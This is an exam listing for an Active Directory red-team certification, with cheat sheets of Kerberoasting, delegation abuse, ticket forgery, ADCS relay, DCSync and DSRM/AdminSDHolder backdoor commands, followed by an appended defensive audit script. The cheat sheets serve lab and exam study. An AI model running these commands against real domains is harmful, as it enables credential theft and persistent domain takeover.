CRTE
Altered Security

Certified Red Team Expert

Advanced | 48hr practical AD lab exam | Pass: Passing | $249

Active Directory red teaming — Kerberoasting, DCSync, BloodHound, lateral movement.

Issuer: Altered Security
Format: 48hr practical AD lab exam
Duration: 48 hours
Pass Score: Passing
Cheat Sheets
AD Enumeration & Kerberos Attacks

PowerView — Key Enumeration Commands

# Domain info
Get-Domain; Get-DomainController; Get-DomainTrust; Get-ForestTrust

# User enum
Get-DomainUser | select samaccountname, memberof, admincount, description
Get-DomainUser -SPN | select samaccountname, serviceprincipalname
Get-DomainUser -PreauthNotRequired | select samaccountname

# Group enum
Get-DomainGroup -Identity "Domain Admins" | select -ExpandProperty member
Get-DomainGroupMember -Identity "Enterprise Admins" -Recurse

# Computer enum
Get-DomainComputer -Unconstrained | select dnshostname
Get-DomainComputer -TrustedToAuth | select dnshostname,msds-allowedtodelegateto

# ACL abuse
Find-InterestingDomainAcl -ResolveGUIDs | where {$_.IdentityReferenceName -match "lowpriv"}
Get-DomainObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs

# Local admin
Find-LocalAdminAccess -Verbose | select ComputerName

Kerberos Attacks with Rubeus

# Kerberoast all SPNs
.\Rubeus.exe kerberoast /outfile:hashes.txt /format:hashcat

# AS-REP Roast
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

# Unconstrained delegation + TGT theft
.\Rubeus.exe monitor /interval:5 /targetuser:DC01$ /nowrap
# Then force authentication with SpoolSample or PetitPotam

# S4U2Self + S4U2Proxy (constrained delegation)
.\Rubeus.exe s4u /user:svc$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/fileserver /ptt

# Over-pass-the-Hash (pass-the-key)
.\Rubeus.exe asktgt /user:admin /rc4:NTLMhash /ptt

# Golden ticket
.\Rubeus.exe golden /user:Administrator /domain:domain.local /sid:S-1-5-21-x /rc4:KRBTGThash /ptt

ADCS (Certificate) Attacks

# Find vulnerable templates (ESC1-ESC8)
.\Certify.exe find /vulnerable
certipy find -u user@domain -p pass -dc-ip dc_ip -stdout

# ESC1 — Enroll in template with SAN + Client Auth
.\Certify.exe request /ca:domain\CA-NAME /template:VulnTemplate /altname:administrator
# Convert to PFX, then use with Rubeus:
.\Rubeus.exe asktgt /user:administrator /certificate:admin.pfx /ptt

# ESC8 — NTLM relay to ADCS HTTP endpoint
# Start relay:
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp --adcs --template DomainController
# Coerce auth from DC:
PetitPotam.py attacker_ip dc_ip

Always check for ACL-based attack paths in BloodHound: GenericWrite, GenericAll, WriteDACL, WriteOwner on privileged objects can give full control without touching Kerberos.

Cross-Forest Attacks & Persistence

Cross-Forest Trust Attacks

# Enumerate trusts
Get-DomainTrust; Get-ForestTrust
Get-DomainTrust -Domain external.local
nltest /domain_trusts

# SID History abuse (SID filtering disabled)
# Get child domain SID
Get-DomainSID -Domain child.domain.local
# Forge inter-realm TGT with parent DA SID in SID history
.\Rubeus.exe golden /user:Administrator /domain:child.domain.local /sid:S-1-5-21-child-SID /rc4:KRBTGT_CHILD_HASH /sids:S-1-5-21-parent-SID-519 /ptt

# Foreign principal enumeration
Get-DomainForeignGroupMember -Domain external.local

Persistence Techniques

# Golden Ticket (requires krbtgt hash)
# Get krbtgt via DCSync:
lsadump::dcsync /domain:domain.local /user:krbtgt
# Forge (/endin and /renewmax are in minutes; mimikatz defaults to a 10-year lifetime when they are omitted):
kerberos::golden /user:Administrator /domain:domain.local /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /endin:99999 /renewmax:99999 /ptt

# Silver Ticket (service-specific, no DC needed)
kerberos::golden /user:Administrator /domain:domain.local /sid:DOMAIN_SID /target:server.domain.local /service:cifs /rc4:COMPUTER_HASH /ptt

# DSRM abuse (DC local admin backdoor)
# Enable DSRM login over network:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
# Login: domain\.\Administrator with DSRM hash

# AdminSDHolder backdoor
# Grant lowpriv user DCSync rights via AdminSDHolder ACL
Set-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity lowpriv -Rights DCSync
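Added here as a defender's counterpart to the DSRM and AdminSDHolder entries above (an example audit script, not part of the CRTE cheat sheet): it flags non-default DCSync or full-control ACEs on AdminSDHolder and a DsrmAdminLogonBehavior value that permits network DSRM logons. It assumes the RSAT ActiveDirectory module (which provides the AD: drive) and that it is run on the domain controller whose Lsa key is being checked.

```powershell
# Example audit (assumed environment: RSAT ActiveDirectory module, run on a DC).
Import-Module ActiveDirectory

# Extended-right GUIDs that together make up "DCSync" (directory replication rights).
$ReplRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
# Principals expected to hold broad rights on AdminSDHolder by default; anything else is suspect.
$Expected = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'Domain Admins', 'Enterprise Admins')

$dn  = "CN=AdminSDHolder,CN=System,$((Get-ADDomain).DistinguishedName)"
$acl = Get-Acl -Path "AD:\$dn"

foreach ($ace in $acl.Access) {
    if ($ace.AccessControlType -ne 'Allow') { continue }
    $who = $ace.IdentityReference.Value
    if ($Expected | Where-Object { $who -like "*$_" }) { continue }

    $guid   = $ace.ObjectType.ToString()          # Guid.Empty for non-extended-right ACEs
    $rights = $ace.ActiveDirectoryRights.ToString()
    $isRepl = $ReplRights.ContainsKey($guid)
    $isFull = $rights -match 'GenericAll|WriteDacl|WriteOwner'
    if ($isRepl -or $isFull) {
        $what = if ($isRepl) { $ReplRights[$guid] } else { $rights }
        Write-Warning "AdminSDHolder: '$who' holds $what (inherited: $($ace.IsInherited))"
    }
}

# DSRM: 2 = the DSRM administrator may log on over the network at any time (the backdoor
# setting above); 1 = only while AD DS is stopped; absent or 0 = console/safe-mode only.
$lsa = Get-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' `
       -Name DsrmAdminLogonBehavior -ErrorAction SilentlyContinue
if ($lsa -and $lsa.DsrmAdminLogonBehavior -ne 0) {
    Write-Warning "DsrmAdminLogonBehavior = $($lsa.DsrmAdminLogonBehavior) (expected absent or 0)"
}
```

Because SDProp copies the AdminSDHolder ACL onto every protected object roughly once an hour, an unexpected ACE found here will also appear on Domain Admins and the other protected groups until it is removed from AdminSDHolder itself.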